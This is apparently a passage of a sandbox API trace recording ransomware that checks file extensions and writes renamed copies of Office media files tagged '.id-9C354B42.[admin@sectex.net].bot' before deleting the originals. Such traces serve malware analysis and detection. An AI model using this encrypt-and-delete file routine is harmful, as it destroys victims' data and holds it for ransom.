	[0142.989] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=15264) returned 1
	[0142.990] CloseHandle (hObject=0x38c) returned 1
	[0142.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll")) returned 0x20
	[0142.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0142.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.990] lstrlenW (lpString=".doc") returned 4
	[0142.990] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString=".docx") returned 5
	[0142.990] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0142.990] lstrlenW (lpString=".pdf") returned 4
	[0142.990] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString=".xls") returned 4
	[0142.990] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString=".xlsx") returned 5
	[0142.990] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0142.990] lstrlenW (lpString=".ppt") returned 4
	[0142.990] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.990] lstrlenW (lpString=".zip") returned 4
	[0142.990] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString=".rar") returned 4
	[0142.990] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.990] lstrlenW (lpString=".bz2") returned 4
	[0142.991] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.991] lstrlenW (lpString=".7z") returned 3
	[0142.991] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString=".dbf") returned 4
	[0142.991] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString=".1cd") returned 4
	[0142.991] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString=".jpg") returned 4
	[0142.991] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString=".doc") returned 4
	[0142.991] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString=".docx") returned 5
	[0142.991] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0142.991] lstrlenW (lpString=".pdf") returned 4
	[0142.991] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString=".xls") returned 4
	[0142.991] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString=".xlsx") returned 5
	[0142.991] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0142.991] lstrlenW (lpString=".ppt") returned 4
	[0142.991] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.991] lstrlenW (lpString=".zip") returned 4
	[0142.991] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString=".rar") returned 4
	[0142.991] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.991] lstrlenW (lpString=".bz2") returned 4
	[0142.992] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.992] lstrlenW (lpString=".7z") returned 3
	[0142.992] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.992] lstrlenW (lpString=".dbf") returned 4
	[0142.992] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.992] lstrlenW (lpString=".1cd") returned 4
	[0142.992] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68
	[0142.992] lstrlenW (lpString=".jpg") returned 4
	[0142.992] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.992] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0142.992] lstrlenW (lpString="LINES.DLL") returned 9
	[0142.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0142.997] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=15256) returned 1
	[0142.997] CloseHandle (hObject=0x3ac) returned 1
	[0142.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll")) returned 0x20
	[0142.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0142.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.997] lstrlenW (lpString=".doc") returned 4
	[0142.997] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.997] lstrlenW (lpString=".docx") returned 5
	[0142.997] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0142.997] lstrlenW (lpString=".pdf") returned 4
	[0142.998] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString=".xls") returned 4
	[0142.998] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString=".xlsx") returned 5
	[0142.998] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0142.998] lstrlenW (lpString=".ppt") returned 4
	[0142.998] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString=".zip") returned 4
	[0142.998] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString=".rar") returned 4
	[0142.998] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString=".bz2") returned 4
	[0142.998] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.998] lstrlenW (lpString=".7z") returned 3
	[0142.998] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString=".dbf") returned 4
	[0142.998] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString=".1cd") returned 4
	[0142.998] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString=".jpg") returned 4
	[0142.998] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.998] lstrlenW (lpString=".doc") returned 4
	[0142.998] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.998] lstrlenW (lpString=".docx") returned 5
	[0142.998] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0142.998] lstrlenW (lpString=".pdf") returned 4
	[0142.998] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.999] lstrlenW (lpString=".xls") returned 4
	[0142.999] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.999] lstrlenW (lpString=".xlsx") returned 5
	[0142.999] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0142.999] lstrlenW (lpString=".ppt") returned 4
	[0142.999] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.999] lstrlenW (lpString=".zip") returned 4
	[0142.999] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.999] lstrlenW (lpString=".rar") returned 4
	[0142.999] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.999] lstrlenW (lpString=".bz2") returned 4
	[0142.999] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.999] lstrlenW (lpString=".7z") returned 3
	[0142.999] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.999] lstrlenW (lpString=".dbf") returned 4
	[0142.999] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.999] lstrlenW (lpString=".1cd") returned 4
	[0142.999] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64
	[0142.999] lstrlenW (lpString=".jpg") returned 4
	[0142.999] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.999] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0142.999] lstrlenW (lpString="OFFICE10.DLL") returned 12
	[0142.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.020] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=15776) returned 1
	[0143.020] CloseHandle (hObject=0x384) returned 1
	[0143.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll")) returned 0x20
	[0143.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.020] lstrlenW (lpString=".doc") returned 4
	[0143.020] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.020] lstrlenW (lpString=".docx") returned 5
	[0143.020] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0143.020] lstrlenW (lpString=".pdf") returned 4
	[0143.020] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".xls") returned 4
	[0143.021] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".xlsx") returned 5
	[0143.021] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0143.021] lstrlenW (lpString=".ppt") returned 4
	[0143.021] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString=".zip") returned 4
	[0143.021] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".rar") returned 4
	[0143.021] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".bz2") returned 4
	[0143.021] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.021] lstrlenW (lpString=".7z") returned 3
	[0143.021] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString=".dbf") returned 4
	[0143.021] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString=".1cd") returned 4
	[0143.021] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString=".jpg") returned 4
	[0143.021] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.021] lstrlenW (lpString=".doc") returned 4
	[0143.021] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".docx") returned 5
	[0143.021] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0143.021] lstrlenW (lpString=".pdf") returned 4
	[0143.021] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.021] lstrlenW (lpString=".xls") returned 4
	[0143.022] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.022] lstrlenW (lpString=".xlsx") returned 5
	[0143.022] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0143.022] lstrlenW (lpString=".ppt") returned 4
	[0143.022] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.022] lstrlenW (lpString=".zip") returned 4
	[0143.022] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.022] lstrlenW (lpString=".rar") returned 4
	[0143.022] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.022] lstrlenW (lpString=".bz2") returned 4
	[0143.022] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.022] lstrlenW (lpString=".7z") returned 3
	[0143.022] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.022] lstrlenW (lpString=".dbf") returned 4
	[0143.022] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.022] lstrlenW (lpString=".1cd") returned 4
	[0143.022] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61
	[0143.022] lstrlenW (lpString=".jpg") returned 4
	[0143.022] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.022] lstrcmpiW (lpString1=".MMW", lpString2=".bot") returned 1
	[0143.022] lstrlenW (lpString="OFFICE10.MMW") returned 12
	[0143.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.023] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=492624) returned 1
	[0143.023] CloseHandle (hObject=0x384) returned 1
	[0143.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 0x20
	[0143.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.023] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.023] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.214] GetLastError () returned 0x0
	[0143.214] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x78450, lpOverlapped=0x0) returned 1
	[0143.230] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x78460, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x78460, lpOverlapped=0x0) returned 1
	[0143.238] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.239] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.239] SetEndOfFile (hFile=0x31c) returned 1
	[0143.239] CloseHandle (hObject=0x31c) returned 1
	[0143.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.239] SetEndOfFile (hFile=0x384) returned 1
	[0143.273] CloseHandle (hObject=0x384) returned 1
	[0143.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 1
	[0143.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.274] lstrlenW (lpString=".doc") returned 4
	[0143.274] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1
	[0143.274] lstrlenW (lpString=".docx") returned 5
	[0143.274] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1
	[0143.274] lstrlenW (lpString=".pdf") returned 4
	[0143.274] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1
	[0143.274] lstrlenW (lpString=".xls") returned 4
	[0143.274] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1
	[0143.274] lstrlenW (lpString=".xlsx") returned 5
	[0143.274] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1
	[0143.274] lstrlenW (lpString=".ppt") returned 4
	[0143.274] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1
	[0143.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.274] lstrlenW (lpString=".zip") returned 4
	[0143.275] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString=".rar") returned 4
	[0143.275] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString=".bz2") returned 4
	[0143.275] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1
	[0143.275] lstrlenW (lpString=".7z") returned 3
	[0143.275] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString=".dbf") returned 4
	[0143.275] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString=".1cd") returned 4
	[0143.275] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString=".jpg") returned 4
	[0143.275] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString=".doc") returned 4
	[0143.275] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1
	[0143.275] lstrlenW (lpString=".docx") returned 5
	[0143.275] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1
	[0143.275] lstrlenW (lpString=".pdf") returned 4
	[0143.275] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString=".xls") returned 4
	[0143.275] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString=".xlsx") returned 5
	[0143.275] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1
	[0143.275] lstrlenW (lpString=".ppt") returned 4
	[0143.275] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.275] lstrlenW (lpString=".zip") returned 4
	[0143.275] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1
	[0143.275] lstrlenW (lpString=".rar") returned 4
	[0143.276] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1
	[0143.276] lstrlenW (lpString=".bz2") returned 4
	[0143.276] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1
	[0143.276] lstrlenW (lpString=".7z") returned 3
	[0143.276] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1
	[0143.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.276] lstrlenW (lpString=".dbf") returned 4
	[0143.276] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1
	[0143.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
	[0143.276] lstrlenW (lpString=".1cd") returned 4
	[0143.276] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1
	[0143.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61
